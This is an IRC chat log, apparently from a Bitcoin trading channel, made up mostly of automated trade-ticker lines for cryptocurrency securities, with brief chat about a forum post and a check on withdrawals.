[LABCOIN] 34 @ 0.00239 = 0.0813 BTC [+] Aug 01 14:02:55 [BTCTC] [LABCOIN] 200 @ 0.002478 = 0.4956 BTC [+] Aug 01 14:02:57 [BTCTC] [LABCOIN] 50 @ 0.002478 = 0.1239 BTC [+] Aug 01 14:02:58 [BTCTC] [LABCOIN] 2000 @ 0.002499 = 4.998 BTC [+] Aug 01 14:03:36 [BTCTC] [LABCOIN] 3258 @ 0.002499 = 8.1417 BTC [+] Aug 01 14:06:02 [BTCTC] [DMS.MINING] 37 @ 0.007205 = 0.2666 BTC [-] Aug 01 14:06:04 [BTCTC] [TAT.ASICMINER] 3 @ 0.03999 = 0.12 BTC [-] Aug 01 14:06:20 [BTCTC] [LABCOIN] 1 @ 0.0024 BTC [-] Aug 01 14:06:41 [BTCTC] [ACTIVEMINING] 8 @ 0.00615 = 0.0492 BTC [-] Aug 01 14:07:14 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [+] Aug 01 14:07:22 [BTCTC] [PAJKA.BOND] 1 @ 0.02844 BTC [+] Aug 01 14:07:23 [BTCTC] [BTCGARDEN] 370 @ 0.016 = 5.92 BTC [+] Aug 01 14:07:58 [BTCTC] [LABCOIN] 18 @ 0.0025 = 0.045 BTC [+] Aug 01 14:08:16 [BTCTC] [BTCGARDEN] 80 @ 0.016 = 1.28 BTC [+] Aug 01 14:08:56 [HAVELOCK] [SDSTM] 2 @ 0.008899 = 0.0178 BTC [-] Aug 01 14:09:02 [BTCTC] [TAT.ASICMINER] 21 @ 0.03998 = 0.8396 BTC [-] Aug 01 14:09:28 [BTCTC] [ASICMINER-PT] 1 @ 4.079 BTC [+] Aug 01 14:09:33 [BTCTC] [BTCGARDEN] 1000 @ 0.016 = 16 BTC [+] Aug 01 14:10:32 [BTCTC] [LABCOIN] 50 @ 0.002614 = 0.1307 BTC [+] Aug 01 14:11:12 [BTCTC] [LABCOIN] 12 @ 0.002613 = 0.0314 BTC [-] Aug 01 14:11:28 [BTCTC] [TAT.ASICMINER] 20 @ 0.03954 = 0.7908 BTC [-] Aug 01 14:11:49 [BTCTC] [TAT.ASICMINER] 45 @ 0.03953 = 1.7789 BTC [-] Aug 01 14:12:46 [BTCTC] [LABCOIN] 1100 @ 0.002613 = 2.8743 BTC [-] Aug 01 14:12:49 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 14:12:51 [BTCTC] [ASICMINER-PT] 2 @ 3.99 = 7.98 BTC [-] Aug 01 14:12:52 [BTCTC] [ASICMINER-PT] 1 @ 3.989 BTC [-] Aug 01 14:12:54 [BTCTC] [ASICMINER-PT] 1 @ 3.989 BTC [-] Aug 01 14:13:59 [BTCTC] [ACTIVEMINING] 25 @ 0.006174 = 0.1544 BTC [+] Aug 01 14:14:36 [BTCTC] [DMS.MINING] 20 @ 0.007797 = 0.1559 BTC [+] Aug 01 14:15:31 [BTCTC] [B.YABMC] 100 @ 0.00232 = 0.232 BTC [-] Aug 01 14:15:44 [BTCTC] [LABCOIN] 1 @ 0.002555 BTC [-] Aug 01 14:15:46 [BTCTC] [LABCOIN] 1 @ 0.0026 BTC [+] Aug 01 14:15:47 [BTCTC] [LABCOIN] 198 @ 0.002613 = 0.5174 BTC [+] Aug 01 14:17:26 [BTCTC] [LABCOIN] 111 @ 0.002613 = 0.29 BTC [+] Aug 01 14:17:41 [BTCTC] [LTC-ATF.B2] 6 @ 0.0103 = 0.0618 BTC [-] Aug 01 14:17:43 [BTCTC] [LTC-ATF.B2] 1 @ 0.0103 BTC [-] Aug 01 14:17:54 [BTCTC] [CRYPTO-TRADE] 10 @ 0.1999 = 1.999 BTC [-] Aug 01 14:18:10 [BTCTC] [ACTIVEMINING] 12 @ 0.006173 = 0.0741 BTC [-] Aug 01 14:18:11 [BTCTC] [ACTIVEMINING] 2 @ 0.006179 = 0.0124 BTC [+] Aug 01 14:18:12 [BTCTC] [ACTIVEMINING] 2 @ 0.00618 = 0.0124 BTC [+] Aug 01 14:18:13 [BTCTC] [ACTIVEMINING] 2 @ 0.006183 = 0.0124 BTC [+] Aug 01 14:18:14 [BTCTC] [ACTIVEMINING] 500 @ 0.006185 = 3.0925 BTC [+] Aug 01 14:18:28 [BTCTC] [ACTIVEMINING] 25 @ 0.006185 = 0.1546 BTC [+] Aug 01 14:18:29 [BTCTC] [LABCOIN] 21 @ 0.002608 = 0.0548 BTC [-] Aug 01 14:18:31 [BTCTC] [ACTIVEMINING] 15 @ 0.006173 = 0.0926 BTC [-] Aug 01 14:18:58 [BTCTC] [LABCOIN] 17 @ 0.00258 = 0.0439 BTC [-] Aug 01 14:19:17 [BTCTC] [LABCOIN] 58 @ 0.00258 = 0.1496 BTC [-] Aug 01 14:19:18 [BTCTC] [LABCOIN] 1579 @ 0.002613 = 4.1259 BTC [+] Aug 01 14:19:20 [BTCTC] [LABCOIN] 749 @ 0.002614 = 1.9579 BTC [+] Aug 01 14:19:20 [BTCTC] [LABCOIN] 75 @ 0.002615 = 0.1961 BTC [+] Aug 01 14:19:21 [BTCTC] [LABCOIN] 984 @ 0.002621 = 2.5791 BTC [+] Aug 01 14:19:22 [BTCTC] [LABCOIN] 1000 @ 0.002635 = 2.635 BTC [+] Aug 01 14:19:23 [BTCTC] [LABCOIN] 500 @ 0.002636 = 1.318 BTC [+] Aug 01 14:19:25 [BTCTC] [LABCOIN] 1700 @ 0.002696 = 4.5832 BTC [+] Aug 01 14:19:26 [BTCTC] [LABCOIN] 3000 @ 0.002698 = 8.094 BTC [+] Aug 01 14:19:27 [BTCTC] [LABCOIN] 500 @ 0.0027 = 1.35 BTC [+] Aug 01 14:19:28 [BTCTC] [LABCOIN] 33 @ 0.002707 = 0.0893 BTC [+] Aug 01 14:19:29 [BTCTC] [LABCOIN] 1000 @ 0.00275 = 2.75 BTC [+] Aug 01 14:19:30 [BTCTC] [LABCOIN] 20 @ 0.002768 = 0.0554 BTC [+] Aug 01 14:19:30 [BTCTC] [LABCOIN] 80 @ 0.002768 = 0.2214 BTC [+] Aug 01 14:19:31 [BTCTC] [LABCOIN] 500 @ 0.00277 = 1.385 BTC [+] Aug 01 14:19:32 [BTCTC] [LABCOIN] 1000 @ 0.00279 = 2.79 BTC [+] Aug 01 14:19:33 [BTCTC] [LABCOIN] 779 @ 0.0028 = 2.1812 BTC [+] Aug 01 14:19:34 [BTCTC] [LABCOIN] 9 @ 0.0028 = 0.0252 BTC [+] Aug 01 14:19:36 [BTCTC] [LABCOIN] 1000 @ 0.002805 = 2.805 BTC [+] Aug 01 14:19:37 [BTCTC] [LABCOIN] 100 @ 0.002808 = 0.2808 BTC [+] Aug 01 14:19:38 [BTCTC] [LABCOIN] 1 @ 0.002865 BTC [+] Aug 01 14:19:39 [BTCTC] [LABCOIN] 2000 @ 0.002873 = 5.746 BTC [+] Aug 01 14:19:40 [BTCTC] [LABCOIN] 4000 @ 0.002873 = 11.492 BTC [+] Aug 01 14:19:40 [BTCTC] [LABCOIN] 2431 @ 0.002876 = 6.9916 BTC [+] Aug 01 14:19:42 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 14:19:43 [BTCTC] [BTCGARDEN] 709 @ 0.016 = 11.344 BTC [+] Aug 01 14:19:45 [BTCTC] [BTCGARDEN] 468 @ 0.016 = 7.488 BTC [+] Aug 01 14:20:48 [BTCTC] [LABCOIN] 50 @ 0.002635 = 0.1318 BTC [-] Aug 01 14:22:12 [BTCTC] [LABCOIN] 120 @ 0.002872 = 0.3446 BTC [+] Aug 01 14:22:13 [BTCTC] [LABCOIN] 50 @ 0.002875 = 0.1438 BTC [+] Aug 01 14:22:15 [BTCTC] [LABCOIN] 830 @ 0.002876 = 2.3871 BTC [+] Aug 01 14:22:57 [BTCTC] [LABCOIN] 50 @ 0.00261 = 0.1305 BTC [-] Aug 01 14:24:56 [BTCTC] [LABCOIN] 50 @ 0.00285 = 0.1425 BTC [+] Aug 01 14:24:57 [BTCTC] [LABCOIN] 50 @ 0.002875 = 0.1438 BTC [+] Aug 01 14:24:59 [BTCTC] [LABCOIN] 739 @ 0.002876 = 2.1254 BTC [+] Aug 01 14:27:04 [BTCTC] [LABCOIN] 1 @ 0.00285 BTC [-] Aug 01 14:28:32 [BTCTC] [LABCOIN] 130 @ 0.00279 = 0.3627 BTC [-] Aug 01 14:29:09 [BTCTC] [ACTIVEMINING] 50 @ 0.00617 = 0.3085 BTC [-] Aug 01 14:29:10 [BTCTC] [ACTIVEMINING] 5 @ 0.006171 = 0.0309 BTC [+] Aug 01 14:29:12 [BTCTC] [ACTIVEMINING] 156 @ 0.006185 = 0.9649 BTC [+] Aug 01 14:29:13 [BTCTC] [ACTIVEMINING] 789 @ 0.006186 = 4.8808 BTC [+] Aug 01 14:30:18 [BTCTC] [BTCGARDEN] 200 @ 0.016 = 3.2 BTC [+] Aug 01 14:30:20 [BTCTC] [BTCGARDEN] 99 @ 0.016 = 1.584 BTC [+] Aug 01 14:30:39 [BTCTC] [LABCOIN] 110 @ 0.002797 = 0.3077 BTC [+] Aug 01 14:30:41 [BTCTC] [LABCOIN] 790 @ 0.0028 = 2.212 BTC [+] Aug 01 14:30:55 [BTCTC] [TAT.MINIGAME] 2451 @ 0.00026 = 0.6373 BTC [-] Aug 01 14:31:19 [BTCTC] [BTCGARDEN] 24 @ 0.016 = 0.384 BTC [+] Aug 01 14:34:19 [MPEX] [S.MPOE] 9400 @ 0.00080487 = 7.5658 BTC [-] Aug 01 14:34:20 [BTCTC] [TAT.VIRTUALMINE] 50 @ 0.002934 = 0.1467 BTC [+] Aug 01 14:34:56 [BTCTC] [TAT.ASICMINER] 12 @ 0.03957 = 0.4748 BTC [+] Aug 01 14:34:57 [BTCTC] [TAT.ASICMINER] 28 @ 0.03956 = 1.1077 BTC [-] Aug 01 14:34:59 [BTCTC] [TAT.ASICMINER] 15 @ 0.03954 = 0.5931 BTC [-] Aug 01 14:35:00 [BTCTC] [TAT.ASICMINER] 59 @ 0.03953 = 2.3323 BTC [-] Aug 01 14:35:01 [BTCTC] [TAT.ASICMINER] 7 @ 0.03952 = 0.2766 BTC [-] Aug 01 14:35:02 [BTCTC] [TAT.ASICMINER] 100 @ 0.03951 = 3.951 BTC [-] Aug 01 14:35:04 [BTCTC] [TAT.ASICMINER] 11 @ 0.0395 = 0.4345 BTC [-] Aug 01 14:35:34 [BTCTC] [TAT.VIRTUALMINE] 283 @ 0.002935 = 0.8306 BTC [+] Aug 01 14:35:34 [BTCTC] [TAT.ASICMINER] 4 @ 0.03936 = 0.1574 BTC [-] Aug 01 14:35:47 [HAVELOCK] [AM100] 2 @ 0.0398 = 0.0796 BTC [-] Aug 01 14:35:56 [BTCTC] [TAT.ASICMINER] 9 @ 0.03935 = 0.3542 BTC [-] Aug 01 14:36:01 [BTCTC] [TAT.ASICMINER] 90 @ 0.03903 = 3.5127 BTC [-] Aug 01 14:37:59 [BTCTC] [ACTIVEMINING] 50 @ 0.006013 = 0.3007 BTC [-] Aug 01 14:38:00 [BTCTC] [ACTIVEMINING] 37 @ 0.006012 = 0.2224 BTC [-] Aug 01 14:38:02 [BTCTC] [ACTIVEMINING] 25 @ 0.00601 = 0.1503 BTC [-] Aug 01 14:38:03 [BTCTC] [ACTIVEMINING] 200 @ 0.006001 = 1.2002 BTC [-] Aug 01 14:38:04 [BTCTC] [ACTIVEMINING] 188 @ 0.006 = 1.128 BTC [-] Aug 01 14:38:46 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 14:38:49 [BTCTC] [BTCGARDEN] 52 @ 0.016 = 0.832 BTC [+] Aug 01 14:39:09 [BTCTC] [BTCGARDEN] 284 @ 0.016 = 4.544 BTC [+] Aug 01 14:39:18 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 14:39:41 [BTCTC] [BTCGARDEN] 2800 @ 0.016 = 44.8 BTC [+] Aug 01 14:39:44 [BTCTC] [BTCGARDEN] 143 @ 0.016 = 2.288 BTC [+] Aug 01 14:39:52 [BTCTC] [LABCOIN] 18 @ 0.002799 = 0.0504 BTC [-] Aug 01 14:40:03 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 14:40:17 [BTCTC] [TAT.VIRTUALMINE] 9 @ 0.002937 = 0.0264 BTC [+] Aug 01 14:40:18 [BTCTC] [TAT.ASICMINER] 45 @ 0.03904 = 1.7568 BTC [+] Aug 01 14:40:56 [BTCTC] [LABCOIN] 28 @ 0.002799 = 0.0784 BTC [-] Aug 01 14:41:13 [BTCTC] [LABCOIN] 1 @ 0.002782 BTC [-] Aug 01 14:41:14 [BTCTC] [LABCOIN] 2899 @ 0.002624 = 7.607 BTC [-] Aug 01 14:41:28 [BTCTC] [ASICMINER-PT] 1 @ 4.079 BTC [+] Aug 01 14:42:00 [BTCTC] [BFMINES] 5 @ 0.00351 = 0.0176 BTC [-] Aug 01 14:42:02 [BTCTC] [BFMINES] 5 @ 0.00351 = 0.0176 BTC [-] Aug 01 14:42:03 [BTCTC] [BFMINES] 300 @ 0.003502 = 1.0506 BTC [-] Aug 01 14:42:05 [BTCTC] [BFMINES] 400 @ 0.003501 = 1.4004 BTC [-] Aug 01 14:42:06 [BTCTC] [BFMINES] 150 @ 0.0035 = 0.525 BTC [-] Aug 01 14:42:19 [BTCTC] [LABCOIN] 8 @ 0.002625 = 0.021 BTC [+] Aug 01 14:42:32 [BTCTC] [ASICMINER-PT] 2 @ 4.08 = 8.16 BTC [+] Aug 01 14:43:05 [BTCTC] [ACTIVEMINING] 100 @ 0.006001 = 0.6001 BTC [+] Aug 01 14:43:07 [BTCTC] [ACTIVEMINING] 212 @ 0.006 = 1.272 BTC [-] Aug 01 14:43:07 [BTCTC] [ACTIVEMINING] 170 @ 0.005921 = 1.0066 BTC [-] Aug 01 14:43:08 [BTCTC] [ACTIVEMINING] 340 @ 0.00592 = 2.0128 BTC [-] Aug 01 14:43:09 [BTCTC] [ACTIVEMINING] 298 @ 0.005901 = 1.7585 BTC [-] Aug 01 14:43:33 [BTCTC] [LABCOIN] 670 @ 0.002799 = 1.8753 BTC [+] Aug 01 14:43:34 [BTCTC] [ACTIVEMINING] 84 @ 0.0059 = 0.4956 BTC [-] Aug 01 14:43:44 [BTCTC] [ACTIVEMINING] 500 @ 0.0059 = 2.95 BTC [-] Aug 01 14:44:14 [BTCTC] [LABCOIN] 2 @ 0.002798 = 0.0056 BTC [-] Aug 01 14:44:16 [BTCTC] [LABCOIN] 1000 @ 0.002798 = 2.798 BTC [-] Aug 01 14:44:32 [BTCTC] [LABCOIN] 998 @ 0.002798 = 2.7924 BTC [-] Aug 01 14:44:41 [BTCTC] [TAT.VIRTUALMINE] 5 @ 0.002987 = 0.0149 BTC [+] Aug 01 14:44:56 [BTCTC] [LABCOIN] 284 @ 0.002799 = 0.7949 BTC [+] Aug 01 14:45:23 [BTCTC] [TAT.VIRTUALMINE] 700 @ 0.002988 = 2.0916 BTC [+] Aug 01 14:48:09 [BTCTC] [LABCOIN] 50 @ 0.002799 = 0.14 BTC [+] Aug 01 14:48:23 [BTCTC] [LABCOIN] 1000 @ 0.002799 = 2.799 BTC [+] Aug 01 14:49:00 [BTCTC] [ACTIVEMINING] 51 @ 0.006 = 0.306 BTC [+] Aug 01 14:49:02 [BTCTC] [ACTIVEMINING] 102 @ 0.006001 = 0.6121 BTC [+] Aug 01 14:49:03 [BTCTC] [ACTIVEMINING] 176 @ 0.0061 = 1.0736 BTC [+] Aug 01 14:50:00 [BTCTC] [LABCOIN] 470 @ 0.002799 = 1.3155 BTC [+] Aug 01 14:51:03 [BTCTC] [TAT.ASICMINER] 50 @ 0.03996 = 1.998 BTC [+] Aug 01 14:51:05 [BTCTC] [TAT.ASICMINER] 31 @ 0.03999 = 1.2397 BTC [+] Aug 01 14:51:06 [BTCTC] [TAT.ASICMINER] 3 @ 0.04 = 0.12 BTC [+] Aug 01 14:51:06 IDK why but I call bullshit on: https://bitcointalk.org/index.php?topic=101902.msg2846509#msg2846509 Aug 01 14:51:27 [BTCTC] [BTCGARDEN] 90 @ 0.016 = 1.44 BTC [+] Aug 01 14:51:27 [BTCTC] [ACTIVEMINING] 300 @ 0.0061 = 1.83 BTC [+] Aug 01 14:51:30 [BTCTC] [BTCGARDEN] 100 @ 0.016 = 1.6 BTC [+] Aug 01 14:51:33 [BTCTC] [BTCGARDEN] 800 @ 0.016 = 12.8 BTC [+] Aug 01 14:52:09 [BTCTC] [LABCOIN] 650 @ 0.002798 = 1.8187 BTC [-] Aug 01 14:52:44 i dun think the guy knows what he's doing. Aug 01 14:53:52 [BTCTC] [LABCOIN] 4 @ 0.002798 = 0.0112 BTC [-] Aug 01 14:54:02 [BTCTC] [ASICMINER-PT] 4 @ 4.015 = 16.06 BTC [-] Aug 01 14:54:46 [MPEX] [S.MPOE] 1762 @ 0.00080487 = 1.4182 BTC [-] Aug 01 14:54:52 [MPEX] [S.MPOE] 5449 @ 0.00080366 = 4.3791 BTC [-] Aug 01 14:56:54 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Aug 01 14:57:24 [BTCTC] [LABCOIN] 3 @ 0.002798 = 0.0084 BTC [-] Aug 01 14:59:19 anyone here has a bitmit account ? Aug 01 15:00:27 [BTCTC] [LABCOIN] 1000 @ 0.002797 = 2.797 BTC [-] Aug 01 15:00:28 [BTCTC] [LABCOIN] 333 @ 0.002798 = 0.9317 BTC [+] Aug 01 15:00:48 [BTCTC] [ACTIVEMINING] 105 @ 0.006185 = 0.6494 BTC [+] Aug 01 15:01:05 [BTCTC] [LABCOIN] 1000 @ 0.002796 = 2.796 BTC [-] Aug 01 15:01:12 [HAVELOCK] [AM100] 1 @ 0.0399 BTC [+] Aug 01 15:01:39 [BTCTC] [LABCOIN] 900 @ 0.002798 = 2.5182 BTC [+] Aug 01 15:01:41 [BTCTC] [LABCOIN] 100 @ 0.002798 = 0.2798 BTC [+] Aug 01 15:02:16 [BTCTC] [LABCOIN] 2697 @ 0.002799 = 7.5489 BTC [+] Aug 01 15:02:18 [BTCTC] [LABCOIN] 3608 @ 0.002799 = 10.0988 BTC [+] Aug 01 15:02:20 [BTCTC] [BTCGARDEN] 600 @ 0.016 = 9.6 BTC [+] Aug 01 15:02:23 [BTCTC] [BTCGARDEN] 102 @ 0.016 = 1.632 BTC [+] Aug 01 15:02:51 [BTCTC] [BTCGARDEN] 30 @ 0.016 = 0.48 BTC [+] Aug 01 15:03:17 [BTCTC] [BTCGARDEN] 375 @ 0.016 = 6 BTC [+] Aug 01 15:04:20 [BTCTC] [LABCOIN] 100 @ 0.00278 = 0.278 BTC [-] Aug 01 15:04:21 [BTCTC] [LABCOIN] 400 @ 0.0028 = 1.12 BTC [+] Aug 01 15:04:33 [BTCTC] [LABCOIN] 100 @ 0.0028 = 0.28 BTC [+] Aug 01 15:05:27 [BTCTC] [TAT.ASICMINER] 4 @ 0.0396 = 0.1584 BTC [-] Aug 01 15:05:29 [BTCTC] [TAT.ASICMINER] 6 @ 0.0396 = 0.2376 BTC [-] Aug 01 15:05:30 [BTCTC] [TAT.ASICMINER] 18 @ 0.0395 = 0.711 BTC [-] Aug 01 15:05:40 [BTCTC] [LABCOIN] 710 @ 0.0028 = 1.988 BTC [+] Aug 01 15:05:42 [BTCTC] [LABCOIN] 30 @ 0.00283 = 0.0849 BTC [+] Aug 01 15:05:43 [BTCTC] [LABCOIN] 1000 @ 0.002849 = 2.849 BTC [+] Aug 01 15:05:44 [BTCTC] [LABCOIN] 2350 @ 0.00285 = 6.6975 BTC [+] Aug 01 15:05:46 [BTCTC] [LABCOIN] 1000 @ 0.00285 = 2.85 BTC [+] Aug 01 15:07:03 [BTCTC] [LABCOIN] 1000 @ 0.002879 = 2.879 BTC [+] Aug 01 15:07:17 [BTCTC] [ACTIVEMINING] 90 @ 0.006186 = 0.5567 BTC [+] Aug 01 15:08:06 [BTCTC] [COGNITIVE] 10 @ 0.509 = 5.09 BTC [-] Aug 01 15:08:07 [BTCTC] [COGNITIVE] 12 @ 0.5091 = 6.1092 BTC [+] Aug 01 15:08:09 [BTCTC] [TAT.ASICMINER] 1 @ 0.0397 BTC [+] Aug 01 15:08:17 [BTCTC] [LABCOIN] 1 @ 0.002888 BTC [+] Aug 01 15:08:18 [BTCTC] [LABCOIN] 82 @ 0.002888 = 0.2368 BTC [+] Aug 01 15:08:20 [BTCTC] [LABCOIN] 120 @ 0.002888 = 0.3466 BTC [+] Aug 01 15:08:21 [BTCTC] [LABCOIN] 100 @ 0.002889 = 0.2889 BTC [+] Aug 01 15:08:22 [BTCTC] [LABCOIN] 1000 @ 0.00289 = 2.89 BTC [+] Aug 01 15:08:30 [BTCTC] [TAT.ASICMINER] 1 @ 0.0397 BTC [+] Aug 01 15:10:00 [BTCTC] [LABCOIN] 480 @ 0.00289 = 1.3872 BTC [+] Aug 01 15:10:03 [BTCTC] [LABCOIN] 4000 @ 0.00289 = 11.56 BTC [+] Aug 01 15:10:21 [BTCTC] [LABCOIN] 492 @ 0.00289 = 1.4219 BTC [+] Aug 01 15:10:45 [BTCTC] [LABCOIN] 142 @ 0.002895 = 0.4111 BTC [+] Aug 01 15:10:48 [BTCTC] [LABCOIN] 1500 @ 0.002895 = 4.3425 BTC [+] Aug 01 15:10:49 [BTCTC] [LABCOIN] 2563 @ 0.002909 = 7.4558 BTC [+] Aug 01 15:10:50 [BTCTC] [LABCOIN] 237 @ 0.00292 = 0.692 BTC [+] Aug 01 15:10:59 [BTCTC] [LABCOIN] 200 @ 0.00289 = 0.578 BTC [-] Aug 01 15:11:02 [BTCTC] [LABCOIN] 5800 @ 0.00289 = 16.762 BTC [-] Aug 01 15:11:28 [BTCTC] [LABCOIN] 39 @ 0.00289 = 0.1127 BTC [-] Aug 01 15:11:38 [BTCTC] [LABCOIN] 460 @ 0.0028 = 1.288 BTC [-] Aug 01 15:11:39 [BTCTC] [ASICMINER-PT] 1 @ 4.015 BTC [-] Aug 01 15:11:41 [BTCTC] [ASICMINER-PT] 1 @ 4.01 BTC [-] Aug 01 15:11:43 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 15:11:44 [BTCTC] [ASICMINER-PT] 1 @ 4 BTC [-] Aug 01 15:11:46 [BTCTC] [LABCOIN] 75 @ 0.00289 = 0.2168 BTC [+] Aug 01 15:11:49 [BTCTC] [LABCOIN] 50 @ 0.00289 = 0.1445 BTC [+] Aug 01 15:12:06 ;;ident DeaDTerra Aug 01 15:12:07 Nick 'DeaDTerra', with hostmask 'DeaDTerra!4f66a894@gateway/web/freenode/ip.79.102.168.148', is identified as user DeaDTerra, with GPG key id A66A3733FC94B88F, key fingerprint 50D437162E449CAD98B9922AA66A3733FC94B88F, and bitcoin address 1G3R6eo4PYM3ZHRyKJofqo9ZJwRswzk3PR Aug 01 15:12:08 [BTCTC] [LABCOIN] 428 @ 0.00289 = 1.2369 BTC [+] Aug 01 15:12:09 [BTCTC] [LABCOIN] 763 @ 0.00292 = 2.228 BTC [+] Aug 01 15:12:11 [BTCTC] [LABCOIN] 1000 @ 0.002935 = 2.935 BTC [+] Aug 01 15:12:12 [BTCTC] [ACTIVEMINING] 21 @ 0.006185 = 0.1299 BTC [-] Aug 01 15:12:12 [BTCTC] [LABCOIN] 1609 @ 0.00294 = 4.7305 BTC [+] Aug 01 15:12:13 [BTCTC] [LABCOIN] 1522 @ 0.002944 = 4.4808 BTC [+] Aug 01 15:12:14 [BTCTC] [LABCOIN] 3780 @ 0.00297 = 11.2266 BTC [+] Aug 01 15:13:32 [BTCTC] [BTCGARDEN] 1240 @ 0.016 = 19.84 BTC [+] Aug 01 15:13:40 [BTCTC] [LABCOIN] 1 @ 0.00298 BTC [+] Aug 01 15:13:54 [BTCTC] [BTC-BOND] 10 @ 0.009999 = 0.1 BTC [+] Aug 01 15:14:32 [BTCTC] [LABCOIN] 219 @ 0.00297 = 0.6504 BTC [-] Aug 01 15:14:45 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Aug 01 15:15:20 [BTCTC] [ASICMINER-PT] 3 @ 4 = 12 BTC [-] Aug 01 15:15:41 mircea_popescu ? Aug 01 15:15:52 hm ? Aug 01 15:15:56 ah i see DeaDTerra is here Aug 01 15:16:05 he had left me a skype poking me to ask you to check withdraws Aug 01 15:16:16 [BTCTC] [LABCOIN] 30 @ 0.00298 = 0.0894 BTC [+] Aug 01 15:16:18 yeah i'm helping him sort it out. Aug 01 15:16:18 [BTCTC] [LABCOIN] 9 @ 0.00297 = 0.0267 BTC [-] Aug 01 15:16:22 kk :) Aug 01 15:16:23 thanks Aug 01 15:16:37 [BTCTC] [LABCOIN] 2969 @ 0.00298 = 8.8476 BTC [+] Aug 01 15:18:02 [BTCTC] [LABCOIN] 30 @ 0.00298 = 0.0894 BTC [+] Aug 01 15:18:04 [BTCTC] [LABCOIN] 4278 @ 0.00297 = 12.7057 BTC [-] Aug 01 15:18:49 [BTCTC] [ASICMINER-PT] 1 @ 4.008 BTC [+] Aug 01 15:18:51 [BTCTC] [ASICMINER-PT] 8 @ 4.009 = 32.072 BTC [+] Aug 01 15:19:38 [BTCTC] [LABCOIN] 5 @ 0.00297 = 0.0149 BTC [-] Aug 01 15:21:03 [HAVELOCK] [AM100] 38 @ 0.03989999 = 1.5162 BTC [-] Aug 01 15:21:42 [HAVELOCK] [AM100] 2 @ 0.0383 = 0.0766 BTC [-] Aug 01 15:21:57 [BTCTC] [LABCOIN] 1 @ 0.002899 BTC [-] Aug 01 15:22:13 [BTCTC] [ACTIVEMINING] 60 @ 0.006185 = 0.3711 BTC [-] Aug 01 15:22:13 [BTCTC] [ACTIVEMINING] 121 @ 0.006186 = 0.7485 BTC [+] Aug 01 15:22:16 [BTCTC] [TAT.ASICMINER] 12 @ 0.03969 = 0.4763 BTC [-] Aug 01 15:22:17 [BTCTC] [TAT.ASICMINER] 38 @ 0.03969 = 1.5082 BTC [-] Aug 01 15:22:51 [HAVELOCK] [AM100] 2 @ 0.03825 = 0.0765 BTC [-] Aug 01 15:22:53 [HAVELOCK] [AM100] 1 @ 0.0382 BTC [-] Aug 01 15:22:56 [HAVELOCK] [AM100] 2 @ 0.03810001 = 0.0762 BTC [-] Aug 01 15:22:58 [HAVELOCK] [AM100] 2 @ 0.0381 = 0.0762 BTC [-] Aug 01 15:23:00 [HAVELOCK] [AM100] 4 @ 0.038 = 0.152 BTC [-] Aug 01 15:23:02 [HAVELOCK] [AM100] 2 @ 0.0379 = 0.0758 BTC [-] Aug 01 15:23:04 [HAVELOCK] [AM100] 1 @ 0.03784348 BTC [-] Aug 01 15:23:06 [HAVELOCK] [AM100] 2 @ 0.0378 = 0.0756 BTC [-] Aug 01 15:23:07 [HAVELOCK] [AM100] 5 @ 0.0378 = 0.189 BTC [-] Aug 01 15:23:09 [HAVELOCK] [AM100] 1 @ 0.03770001 BTC [-] Aug 01 15:23:12 [HAVELOCK] [AM100] 2 @ 0.0377 = 0.0754 BTC [-] Aug 01 15:23:14 [HAVELOCK] [AM100] 34 @ 0.0377 = 1.2818 BTC [-] Aug 01 15:23:16 [HAVELOCK] [AM100] 90 @ 0.0376002 = 3.384 BTC [-] Aug 01 15:23:18 [HAVELOCK] [AM100] 130 @ 0.0376 = 4.888 BTC [-] Aug 01 15:23:33 [HAVELOCK] [AM100] 2 @ 0.0376 = 0.0752 BTC [-] Aug 01 15:24:08 [HAVELOCK] [AM100] 3 @ 0.0376 = 0.1128 BTC [-] Aug 01 15:24:16 [HAVELOCK] [AM100] 2 @ 0.03751 = 0.075 BTC [-] Aug 01 15:24:18 [HAVELOCK] [AM100] 203 @ 0.0375 = 7.6125 BTC [-] Aug 01 15:24:29 [HAVELOCK] [AM100] 1 @ 0.0376 BTC [+] Aug 01 15:25:36 [BTCTC] [BTCGARDEN] 1 @ 0.016 BTC [+] Aug 01 15:25:48 mircea_popescu: yeah i was gonna ask you to check too Aug 01 15:26:31 [BTCTC] [ASICMINER-PT] 2 @ 4 = 8 BTC [-] Aug 01 15:27:16 [BTCTC] [LABCOIN] 1 @ 0.002899 BTC [-] Aug 01 15:27:21 [BTCTC] [DMS.SELLING] 1 @ 0.02273 BTC [-] Aug 01 15:27:22 [BTCTC] [DMS.SELLING] 20 @ 0.02273 = 0.4546 BTC [-] Aug 01 15:27:24 [BTCTC] [DMS.SELLING] 8 @ 0.0228 = 0.1824 BTC [+] Aug 01 15:27:48 [BTCTC] [DMS.MINING] 20 @ 0.007795 = 0.1559 BTC [-] Aug 01 15:27:50 [BTCTC] [DMS.MINING] 37 @ 0.007796 = 0.2885 BTC [+] Aug 01 15:28:17 [BTCTC] [ACTIVEMINING] 7 @ 0.006343 = 0.0444 BTC [+] Aug 01 15:28:30 [BTCTC] [DMS.SELLING] 33 @ 0.02298 = 0.7583 BTC [+] Aug 01 15:28:46 [BTCTC] [ACTIVEMINING] 66 @ 0.006343 = 0.4186 BTC [+] Aug 01 15:29:24 [BTCTC] [CRYPTO-TRADE] 12 @ 0.1998 = 2.3976 BTC [-] Aug 01 15:29:38 [BTCTC] [LABCOIN] 1 @ 0.00277 BTC [-] Aug 01 15:29:40 [BTCTC] [LABCOIN] 9 @ 0.002898 = 0.0261 BTC [+] Aug 01 15:29:47 pigeons i'd guess ~1 hour Aug 01 15:30:55 [MPEX] [S.MG] 10000 @ 0.0002525 = 2.525 BTC [-] Aug 01 15:30:57 [MPEX] [S.MG] 4500 @ 0.0002525 = 1.1363 BTC [-] Aug 01 15:30:58 [MPEX] [S.MG] 10000 @ 0.0002505 = 2.505 BTC [-] Aug 01 15:30:59 [MPEX] [S.MG] 28000 @ 0.00025 = 7 BTC [-] Aug 01 